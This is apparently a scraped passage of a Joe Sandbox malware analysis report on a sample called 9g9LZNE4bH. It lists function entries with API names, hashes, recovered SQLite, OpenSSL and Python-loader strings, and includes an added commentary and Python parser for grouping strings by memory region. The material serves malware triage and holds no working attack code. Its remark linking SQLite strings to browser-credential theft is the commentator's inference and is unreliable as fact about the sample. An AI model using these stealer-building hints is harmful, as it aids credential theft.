• Instruction ID: 46536c5922b77fcf228592f417f6fff557ab2719c0fd3e374e782951251f6bed
• Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
• Instruction Fuzzy Hash: 89C1C42290C686D1E761AB95A440ABDB764FB81B80FF54131EA4E07791EF7CEC4DC722

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
• API String ID: 2050909247-2434346643
• Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
• Instruction ID: 5c095a7f8edb46826f69add7f882c1d7a06fe95aeb58edee28593bcec0e75bdb
• Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
• Instruction Fuzzy Hash: FA416021A0C68791EA11FB60E414AE9A335FB54344FF00132EA5D87696FF3CEA19C762

Control-flow Graph

[Control-flow graph of the function at 7ff8a87ee270 (interactive executed / not-executed rendering); node and edge listing not reproduced. Call visible in the graph: CreateFileW]
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
• Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
Similarity
• API ID: 00007$CreateFile
• String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
• API String ID: 4190464644-3829269058
• Opcode ID: 5280a881b324a4cb6ad05f88a7fce929787e0ce99ba0f6e5e46ce8e41aa4a42d
• Instruction ID: dcfe00dc376ae349572c3bc5eec81d3737cf26d208ef491c454cd3ec0870a0cf
• Opcode Fuzzy Hash: 5280a881b324a4cb6ad05f88a7fce929787e0ce99ba0f6e5e46ce8e41aa4a42d
• Instruction Fuzzy Hash: B902D622A0F642A7FB549F21E84827977A0FF94BC5F490639DD4E136A0EF3CE4448728
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
• Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
Similarity
• API ID: 00007
• String ID: -journal$immutable$nolock
• API String ID: 3568877910-4201244970
• Opcode ID: e194d45f35b2fbaba2ac2ccadb7d2706a34cf4a89d42d3abf1769ea237e5720f
• Instruction ID: 8bd5fc71df3852a3bf37ba35e9f7d6c9aab19990f2c44ed9da8eab99499cf8c9
• Opcode Fuzzy Hash: e194d45f35b2fbaba2ac2ccadb7d2706a34cf4a89d42d3abf1769ea237e5720f
• Instruction Fuzzy Hash: 8D32EF22A0A786A6EB648F26944437937A1FF04BE4F084238CE5E17794DF7DE851C328
Strings
Memory Dump Source
• Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
• Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
Similarity
• API ID:
• String ID: %s at line %d of [%.10s]$a29f9949895322123f7c38fbe94c649a9d6e6c9cd0c3b41c96d694552f26b309$database corruption
• API String ID: 0-481979681
• Opcode ID: 47c23143dffde3d282e8a81709d030b6d57d1bc04be7c078c1f514af51d55724
• Instruction ID: 1100798ef2e9170d13cc5547435e9d09c3e151a7002584ff9f5a32605aee472d
• Opcode Fuzzy Hash: 47c23143dffde3d282e8a81709d030b6d57d1bc04be7c078c1f514af51d55724
• Instruction Fuzzy Hash: D3715162A4A64AA2EB658F12E44437D67A1FF44BC4F184035CE4E077A5DFBCEC61C328
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
• Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
Similarity
• API ID: 00007FileRead
• String ID: delayed %dms for lock/sharing conflict at line %d$winRead
• API String ID: 3505667475-1843600136
• Opcode ID: 34abadc55ce37152a0e625104273f76c47d9f65e3254af17bbb92011d13a92b2
• Instruction ID: 3fecb15ef5fb93165b61af1979a6bc9764450553bc736b3996f5de8266dbf8ec
• Opcode Fuzzy Hash: 34abadc55ce37152a0e625104273f76c47d9f65e3254af17bbb92011d13a92b2
• Instruction Fuzzy Hash: 79412732A0EA02A3E711DF25E8485B97B65FF447C0F484136EA8D637A4EF3CE4468758
APIs
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction ID: 38bb47b91681e90e3759e5caa50946c98ba77ec29ab84b318196f2ebe460bc12
• Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction Fuzzy Hash: 6D41A362D1C781C3E314ABA1A514779A260FF94754F709334EA9C03AD1EF6DE8E8C721
APIs
  • Part of subcall function 00007FF8A87EB300: 00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87EB363
• GetFileAttributesExW.KERNEL32(?,00000000,00000000,00000000,00007FF8A87ED169), ref: 00007FF8A87EEB4A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
• Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
Similarity
• API ID: 00007AttributesFile
• String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
• API String ID: 1825365578-1873940834
• Opcode ID: 84499ab29627b5492aba6b60c0e16a93cc33538438b499d00d1ba5cc5d11729b
• Instruction ID: c76fa17cbdfd20ff3fd5b74cb62dcf2cf920106c8c4e9431a2ece7bff8ba991d
• Opcode Fuzzy Hash: 84499ab29627b5492aba6b60c0e16a93cc33538438b499d00d1ba5cc5d11729b
• Instruction Fuzzy Hash: 4E51D532E4E743A3F724AB24A84463973A0FF947D5F890635D90E136A0EF3CE4818729
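The function entries in this part of the report all share one layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), and the useful pivot for an analyst is usually not the single function but the image base together with the strings the IDA plugin recovered from it. The entries based at 00007FF8A87E0000 carry winOpen, winRead, winAccess, "delayed %dms for lock/sharing conflict at line %d", -journal, nolock and immutable: these are the Windows VFS strings of SQLite, the library a stealer needs in order to read browser profile databases such as history and saved logins, whereas the region at 00007FF78DA50000 shows only CRT and file-handle API names. The Python below is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses entries copied from this page into records and groups the recovered strings by image base. The `$` separator inside `API ID`/`String ID` and the `0` placeholder in `API String ID` are inferred from the entries shown here, not taken from Joe Sandbox documentation.

```python
"""Parse the Joe Sandbox function entries shown on this page into records and
group the recovered strings by image base. Added example, not code from the
Joe Sandbox report; SAMPLE is copied from three entries above, and the '$'
separator and the '0' placeholder in 'API String ID' are inferred from them."""
import re
from collections import defaultdict

SECTION_ORDER = ["APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"]
SOURCE_RE = re.compile(r"Source File: (?P<file>\S+), Offset: (?P<base>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")
BULLET = "•"

SAMPLE = """\
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
• Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmp
Similarity
• API ID: 00007FileRead
• String ID: delayed %dms for lock/sharing conflict at line %d$winRead
• API String ID: 3505667475-1843600136
• Opcode ID: 34abadc55ce37152a0e625104273f76c47d9f65e3254af17bbb92011d13a92b2
• Instruction Fuzzy Hash: 79412732A0EA02A3E711DF25E8485B97B65FF447C0F484136EA8D637A4EF3CE4468758
APIs
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
APIs
  • Part of subcall function 00007FF8A87EB300: 00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87EB363
• GetFileAttributesExW.KERNEL32(?,00000000,00000000,00000000,00007FF8A87ED169), ref: 00007FF8A87EEB4A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
Similarity
• API ID: 00007AttributesFile
• String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
• API String ID: 1825365578-1873940834
"""

def _field(line):
    """'• Opcode ID: abc' -> ('Opcode ID', 'abc'); the value may be empty ('• String ID:')."""
    key, _, value = line.lstrip(BULLET).strip().partition(":")
    return key.strip(), value.strip()

def parse_entries(text):
    """One record per function entry. Sections follow SECTION_ORDER, so a header
    that is not later than the current one marks the start of the next entry."""
    entries, cur, cur_idx = [], None, -1
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_ORDER:
            idx = SECTION_ORDER.index(line)
            if cur is not None and idx <= cur_idx:
                entries.append(cur)
                cur = None
            if cur is None:
                cur = {"apis": [], "source_file": None, "image_base": None, "associated": [], "similarity": {}}
            cur_idx = idx
            continue
        if cur is None:
            continue  # lines before the first header (a truncated entry)
        section, (key, value) = SECTION_ORDER[cur_idx], _field(line)
        if section == "APIs":
            cur["apis"].append(line.lstrip(BULLET).strip())
        elif section == "Memory Dump Source" and key == "Source File":
            m = SOURCE_RE.search(line)
            if m:
                cur["source_file"], cur["image_base"] = m["file"], m["base"]
        elif section == "Memory Dump Source" and key == "Associated":
            cur["associated"].append(value)
        elif section == "Similarity":
            cur["similarity"][key] = value
    if cur is not None:
        entries.append(cur)
    return entries

def split_ids(value):
    """The report packs several values into one field with '$' (e.g. 'exclusive$psow$winOpen')."""
    return [v for v in value.split("$") if v]

def strings_by_image_base(entries):
    """Distinct 'String ID' values per image base: enough to tell which library a
    memory region belongs to before opening the dump in a disassembler."""
    out = defaultdict(set)
    for e in entries:
        out[e["image_base"]].update(split_ids(e["similarity"].get("String ID", "")))
    return {base: sorted(v) for base, v in out.items()}

def api_string_id(entry):
    """'3505667475-1843600136' -> (3505667475, 1843600136); 0 stands for an empty API ID or String ID."""
    api, _, strings = entry["similarity"].get("API String ID", "0-0").partition("-")
    return int(api), int(strings)

if __name__ == "__main__":
    for base, strings in strings_by_image_base(parse_entries(SAMPLE)).items():
        print(base, strings)
```

Run against the full report text rather than SAMPLE, the same parser gives one record per function, and the per-base string sets are what to compare across analyses: the Opcode ID and Instruction Fuzzy Hash fields identify individual functions, but the string set identifies the embedded library even when the build, and therefore every function hash, differs.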
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3251591375-0
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2408503396.00007FF8A92E1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8a92e0000_9g9LZNE4bH.jbxd
Similarity
• API ID: ErrorLast
• String ID: ..\s\ssl\record\rec_layer_s3.c
• API String ID: 1452528299-2209325370
APIs
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
APIs
• RtlFreeHeap.NTDLL(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9CE
• GetLastError.KERNEL32(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9D8
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
APIs
• CloseHandle.KERNEL32(?,?,?,00007FF78DA6AA45,?,?,00000000,00007FF78DA6AAFA), ref: 00007FF78DA6AC36
• GetLastError.KERNEL32(?,?,?,00007FF78DA6AA45,?,?,00000000,00007FF78DA6AAFA), ref: 00007FF78DA6AC40
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
                                                                                                                                                                                                                                        • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                        • Instruction ID: 11b825b06d2f4df90cfa4fabadceda2815e9f63f254cf8df35364a9b72fbfa8f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2521A711B1C64281EB9477E2B450A7E9292BF847A0FB84235D92E477C1FE6CEC4DC312
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                        • Instruction ID: c1059818f53ec85c8e6a1c0b8f46978a3c279a8cf73f3f8bc585a32c2e71f0f4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5241B63290D201C7EA34BBA5B540679B7A4FB55B44FB04131D68D476D1EF2DE806CB62
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                                        • Opcode ID: 8b238289baf9dddcba6bfc48a855cad56bb9a0da69048aaa23f75c3b13f56717
                                                                                                                                                                                                                                        • Instruction ID: 446cc64a2cccb539d2c3f9e237bed5d4a80ee52572a11b335388ea34dc261adc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b238289baf9dddcba6bfc48a855cad56bb9a0da69048aaa23f75c3b13f56717
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE210421B0C65185FA50BAA26400BBAD660BF45BD4FFC0030EE1C47B86EE3CE849C622
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                        • Instruction ID: 2c39e7b62c8a66b456248d06f544c2e4d8643609d781c570979da2e3d2da2bd8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7312C22A1C642C6E6517BA5A841A7CB650BB50F94FF10535EA6D033D2EFBCEC49C732
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                        • Instruction ID: 2018f3d165cfbb6e75aaeb171e427196baba683e2521475bf4e14ae6ebd5d0e4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F114522A1D642C1EA617FA1B40097EE264BF45B84FF44031EB4C57A95EF7EDC44C762
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                        • Instruction ID: 649fee75d137b3dae6ac3cf5ea4774374cfbc4a93a35b9dd80ecfc624af3f2ba
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B021AA7261CA4186D7619F18E440779B7A4FB84B54FB84234D69D476D5EF3CDC08CB11
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
